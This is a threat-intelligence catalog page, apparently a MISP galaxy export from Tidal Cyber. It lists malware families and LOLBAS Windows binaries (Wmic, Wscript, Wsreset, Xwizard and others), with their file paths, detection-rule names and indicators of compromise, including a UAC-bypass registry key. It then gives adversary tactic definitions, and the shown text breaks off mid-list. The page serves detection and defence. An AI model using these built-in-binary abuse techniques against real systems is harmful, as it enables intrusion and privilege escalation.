<sup>[[winrm.vbs - LOLBAS Project](/references/86107810-8a1d-4c13-80f0-c1624143d057)]</sup>

The tag is: misp-galaxy:software="winrm.vbs - Associated Software"

winrm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script used to manage Windows Remote Management (WinRM) settings

Author: Oddvar Moe

Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs

The tag is: misp-galaxy:software="winrm"

WinSCP

WinSCP is a tool used to facilitate file transfer using the Secure Shell (SSH) File Transfer Protocol (SFTP) for Microsoft Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="WinSCP"

Winword.exe - Associated Software

<sup>[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]</sup>

The tag is: misp-galaxy:software="Winword.exe - Associated Software"

Winword

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths:

* C:\Program Files\Microsoft Office\root\Office16\winword.exe
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
* C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
* C:\Program Files\Microsoft Office\Office16\winword.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
* C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
* C:\Program Files\Microsoft Office\Office15\winword.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
* C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
* C:\Program Files\Microsoft Office\Office14\winword.exe
* C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
* C:\Program Files\Microsoft Office\Office12\winword.exe

Detection: * Sigma: [proc_creation_win_office_arbitrary_cli_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]</sup>

The tag is: misp-galaxy:software="Winword"

Wiper

[Wiper](https://app.tidalcyber.com/software/627e05c2-c02e-433e-9288-c2d78bce156f) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. <sup>[[Dell Wiper](https://app.tidalcyber.com/references/be6629ef-e7c6-411c-9bd2-34e59062cadd)]</sup>

The tag is: misp-galaxy:software="Wiper"

Wireshark

Wireshark is a popular open-source packet analyzer utility.

The tag is: misp-galaxy:software="Wireshark"

Wlrmdr.exe - Associated Software

<sup>[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]</sup>

The tag is: misp-galaxy:software="Wlrmdr.exe - Associated Software"

Wlrmdr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Logon Reminder executable

Author: Moshe Kaplan

Paths: * c:\windows\system32\wlrmdr.exe

Detection: * Sigma: [proc_creation_win_lolbin_wlrmdr.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml) * IOC: wlrmdr.exe spawning any new processes<sup>[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]</sup>

The tag is: misp-galaxy:software="Wlrmdr"

Wmic.exe - Associated Software

<sup>[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>

The tag is: misp-galaxy:software="Wmic.exe - Associated Software"

Wmic

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI

Author: Oddvar Moe

Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe

Detection:

* Sigma: [image_load_wmic_remote_xsl_scripting_dlls.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml)
* Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml)
* Sigma: [proc_creation_win_wmic_squiblytwo_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml)
* Sigma: [proc_creation_win_wmic_eventconsumer_creation.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml)
* Elastic: [defense_evasion_suspicious_wmi_script.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml)
* Elastic: [persistence_via_windows_management_instrumentation_event_subscription.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml)
* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)
* Splunk: [xsl_script_execution_with_wmic.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml)
* Splunk: [remote_wmi_command_attempt.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml)
* Splunk: [remote_process_instantiation_via_wmi.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml)
* Splunk: [process_execution_via_wmi.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml)
* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: Wmic retrieving scripts from remote system/Internet location
* IOC: DotNet CLR libraries loaded into wmic.exe
* IOC: DotNet CLR Usage Log - wmic.exe.log<sup>[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>

The tag is: misp-galaxy:software="Wmic"

Woody RAT

[Woody RAT](https://app.tidalcyber.com/software/1f374a54-c839-5139-b755-555c66a21c12) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.<sup>[[MalwareBytes WoodyRAT Aug 2022](https://app.tidalcyber.com/references/5c2ecb15-14e9-5bd3-be5f-628fa4e98ee6)]</sup>

The tag is: misp-galaxy:software="Woody RAT"

WorkFolders.exe - Associated Software

<sup>[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]</sup>

The tag is: misp-galaxy:software="WorkFolders.exe - Associated Software"

WorkFolders

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Work Folders

Author: Elliot Killick

Paths: * C:\Windows\System32\WorkFolders.exe

Detection: * Sigma: [proc_creation_win_susp_workfolders.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml) * IOC: WorkFolders.exe should not be run on a normal workstation<sup>[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]</sup>

The tag is: misp-galaxy:software="WorkFolders"

Wscript.exe - Associated Software

<sup>[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]</sup>

The tag is: misp-galaxy:software="Wscript.exe - Associated Software"

Wscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute scripts

Author: Oddvar Moe

Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe

Detection:

* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)
* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)
* Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml)
* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)
* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)
* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)
* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)
* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: Wscript.exe executing code from alternate data streams
* IOC: DotNet CLR libraries loaded into wscript.exe
* IOC: DotNet CLR Usage Log - wscript.exe.log<sup>[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]</sup>

The tag is: misp-galaxy:software="Wscript"

Wsl.exe - Associated Software

<sup>[[Wsl.exe - LOLBAS Project](/references/c147902a-e8e4-449f-8106-9e268d5367d8)]</sup>

The tag is: misp-galaxy:software="Wsl.exe - Associated Software"

Wsreset.exe - Associated Software

<sup>[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]</sup>

The tag is: misp-galaxy:software="Wsreset.exe - Associated Software"

Wsreset

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to reset Windows Store settings according to its manifest file

Author: Oddvar Moe

Paths: * C:\Windows\System32\wsreset.exe

Detection:

* Sigma: [proc_creation_win_uac_bypass_wsreset_integrity_level.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml)
* Sigma: [proc_creation_win_uac_bypass_wsreset.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml)
* Sigma: [registry_event_bypass_via_wsreset.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml)
* Splunk: [wsreset_uac_bypass.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml)
* IOC: wsreset.exe launching child process other than mmc.exe
* IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
* IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen<sup>[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]</sup>

The tag is: misp-galaxy:software="Wsreset"

wt.exe - Associated Software

<sup>[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]</sup>

The tag is: misp-galaxy:software="wt.exe - Associated Software"

wt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Terminal

Author: Nasreddine Bencherchali

Paths: * C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe

Detection: * Sigma: proc_creation_win_windows_terminal_susp_children.yml<sup>[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]</sup>

The tag is: misp-galaxy:software="wt"

wuauclt.exe - Associated Software

<sup>[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]</sup>

The tag is: misp-galaxy:software="wuauclt.exe - Associated Software"

wuauclt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Update Client

Author: David Middlehurst

Paths: * C:\Windows\System32\wuauclt.exe

Detection:

* Sigma: [net_connection_win_wuauclt_network_connection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml)
* Sigma: [proc_creation_win_lolbin_wuauclt.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml)
* Sigma: [proc_creation_win_wuauclt_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml)
* IOC: wuauclt run with a parameter of a DLL path
* IOC: Suspicious wuauclt Internet/network connections<sup>[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]</sup>

The tag is: misp-galaxy:software="wuauclt"

OSX.Sofacy - Associated Software

The tag is: misp-galaxy:software="OSX.Sofacy - Associated Software"

XAgentOSX

The tag is: misp-galaxy:software="XAgentOSX"

Xbash

[Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.<sup>[[Unit42 Xbash Sept 2018](https://app.tidalcyber.com/references/21b890f7-82db-4840-a05e-2155b8ddce8c)]</sup>

The tag is: misp-galaxy:software="Xbash"

xCaon

[xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) is an HTTP variant of the [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) malware family that has been used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) since at least 2014. [xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.<sup>[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup><sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup>

The tag is: misp-galaxy:software="xCaon"

xCmd

[xCmd](https://app.tidalcyber.com/software/d943d3d9-3a99-464f-94f0-95aa7963d858) is an open source tool that is similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and allows the user to execute applications on remote systems. <sup>[[xCmd](https://app.tidalcyber.com/references/430fc6ef-33c5-4cd8-b785-358e4aae5230)]</sup>

The tag is: misp-galaxy:software="xCmd"

xcopy

xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy command "creates files with the archive attribute set, whether or not this attribute was set in the source file".<sup>[[xcopy Microsoft](/references/05e01751-ebb4-4b09-be89-4e405ab7e7e4)]</sup>

The tag is: misp-galaxy:software="xcopy"

OSX.DubRobber - Associated Software

<sup>[[malwarebyteslabs xcsset dubrobber](https://app.tidalcyber.com/references/11ef576f-1bac-49e3-acba-85d70a42503e)]</sup>

The tag is: misp-galaxy:software="OSX.DubRobber - Associated Software"

XCSSET

[XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.<sup>[[trendmicro xcsset xcode project 2020](https://app.tidalcyber.com/references/0194bb11-8b97-4d61-8ddb-824077edc7db)]</sup>

The tag is: misp-galaxy:software="XCSSET"

XMRig

XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".<sup>[[U.S. CISA Trends June 30 2020](/references/b97e9a02-4cc5-4845-8058-0be4c566cd7c)]</sup>

The tag is: misp-galaxy:software="XMRig"

xpack.exe - Associated Software

The tag is: misp-galaxy:software="xpack.exe - Associated Software"

Xpack

According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Xpack"

Trojan.Shunnael - Associated Software

The tag is: misp-galaxy:software="Trojan.Shunnael - Associated Software"

X-Tunnel - Associated Software

The tag is: misp-galaxy:software="X-Tunnel - Associated Software"

XAPS - Associated Software

The tag is: misp-galaxy:software="XAPS - Associated Software"

XTunnel

[XTunnel](https://app.tidalcyber.com/software/133136f0-7254-4cec-8710-0ab99d5da4e5) is a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) during the compromise of the Democratic National Committee.<sup>[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]</sup><sup>[[Invincea XTunnel](https://app.tidalcyber.com/references/43773784-92b8-4722-806c-4b1fc4278bb0)]</sup><sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:software="XTunnel"

Xwizard.exe - Associated Software

<sup>[[Xwizard.exe - LOLBAS Project](/references/573df5d1-83e7-4437-bdad-604f093b3cfd)]</sup>

The tag is: misp-galaxy:software="Xwizard.exe - Associated Software"

Xwizard

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe

Author: Oddvar Moe

Paths:

  • C:\Windows\System32\xwizard.exe

  • C:\Windows\SysWOW64\xwizard.exe

The tag is: misp-galaxy:software="Xwizard"

YAHOYAH

The tag is: misp-galaxy:software="YAHOYAH"

yty

[yty](https://app.tidalcyber.com/software/e0962ff7-5524-4683-9b95-0e4ba07dccb2) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. <sup>[[ASERT Donot March 2018](https://app.tidalcyber.com/references/a1b987cc-7789-411c-9673-3cf6357b207c)]</sup>

The tag is: misp-galaxy:software="yty"

Zekapab - Associated Software

The tag is: misp-galaxy:software="Zekapab - Associated Software"

Zebrocy

[Zebrocy](https://app.tidalcyber.com/software/e317b8a6-1722-4017-be33-717a5a93ef1c) is a Trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. <sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)]</sup><sup>[[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)]</sup><sup>[[CISA Zebrocy Oct 2020](https://app.tidalcyber.com/references/b7518c4d-6c10-43d2-8e57-d354fb8d4a99)]</sup>

The tag is: misp-galaxy:software="Zebrocy"

Zeroaccess

[Zeroaccess](https://app.tidalcyber.com/software/2f52b513-5293-4833-9c4d-b120e7a84341) is a kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. <sup>[[Sophos ZeroAccess](https://app.tidalcyber.com/references/41b51767-62f1-45c2-98cb-47c44c975a58)]</sup>

The tag is: misp-galaxy:software="Zeroaccess"

Zeus Panda

[Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.<sup>[[Talos Zeus Panda Nov 2017](https://app.tidalcyber.com/references/f96711d4-010d-4d7e-8074-31dd1b41c54d)]</sup><sup>[[GDATA Zeus Panda June 2017](https://app.tidalcyber.com/references/2d9a6957-5645-4863-968b-4a3c8736564b)]</sup>

The tag is: misp-galaxy:software="Zeus Panda"

Zipfldr.dll - Associated Software

<sup>[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]</sup>

The tag is: misp-galaxy:software="Zipfldr.dll - Associated Software"

Zipfldr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Compressed Folder library

Author: LOLBAS Team

Paths:

  • c:\windows\system32\zipfldr.dll

  • c:\windows\syswow64\zipfldr.dll

Detection:

  • Sigma: proc_creation_win_rundll32_susp_activity.yml<sup>[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]</sup>

The tag is: misp-galaxy:software="Zipfldr"

ZLib

[ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) since at least 2014. [ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is malware and should not be confused with the legitimate compression library from which its name is derived.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

The tag is: misp-galaxy:software="ZLib"

ZoxPNG - Associated Software

The tag is: misp-galaxy:software="ZoxPNG - Associated Software"

Gresim - Associated Software

The tag is: misp-galaxy:software="Gresim - Associated Software"

ZoxRPC - Associated Software

The tag is: misp-galaxy:software="ZoxRPC - Associated Software"

Zox

The tag is: misp-galaxy:software="Zox"

zwShell

[zwShell](https://app.tidalcyber.com/software/49314d4e-dc04-456f-918e-a3bedfc3192a) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.<sup>[[McAfee Night Dragon](https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]</sup>

The tag is: misp-galaxy:software="zwShell"

Sensocode - Associated Software

The tag is: misp-galaxy:software="Sensocode - Associated Software"

ZxShell

[ZxShell](https://app.tidalcyber.com/software/eea89ff2-036d-4fa6-bbed-f89502c62318) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.<sup>[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)]</sup><sup>[[Talos ZxShell Oct 2014](https://app.tidalcyber.com/references/41c20013-71b3-4957-98f0-fb919014c93e)]</sup>

The tag is: misp-galaxy:software="ZxShell"

ZxxZ

[ZxxZ](https://app.tidalcyber.com/software/91e1ee26-d6ae-4203-a466-93c9e5019b47) is a trojan written in Visual C++ that has been used by [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) since at least August 2021, including against Bangladeshi government personnel.<sup>[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]</sup>

The tag is: misp-galaxy:software="ZxxZ"

Tidal Tactic

Tidal Tactic Cluster.

Tidal Tactic is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

Reconnaissance

The adversary is trying to gather information they can use to plan future operations.

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.

The tag is: misp-galaxy:tactic="Reconnaissance"

Resource Development

The adversary is trying to establish resources they can use to support operations.

Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.

The tag is: misp-galaxy:tactic="Resource Development"

Initial Access

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

The tag is: misp-galaxy:tactic="Initial Access"

Execution

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

The tag is: misp-galaxy:tactic="Execution"

Persistence

The adversary is trying to maintain their foothold.

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

The tag is: misp-galaxy:tactic="Persistence"

Privilege Escalation

The adversary is trying to gain higher-level permissions.

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:

  • SYSTEM/root level

  • local administrator

  • user account with admin-like access

  • user accounts with access to a specific system or able to perform a specific function

